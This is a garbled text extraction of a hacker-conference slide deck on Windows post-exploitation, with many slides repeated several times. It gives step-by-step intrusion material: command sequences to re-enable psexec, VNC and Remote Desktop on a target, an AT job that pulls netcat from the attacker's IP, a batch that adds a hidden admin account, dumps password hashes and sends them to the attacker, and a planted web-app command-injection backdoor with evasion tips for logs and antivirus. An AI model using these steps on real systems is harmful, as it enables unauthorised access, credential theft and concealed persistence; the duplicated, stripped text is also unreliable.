software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
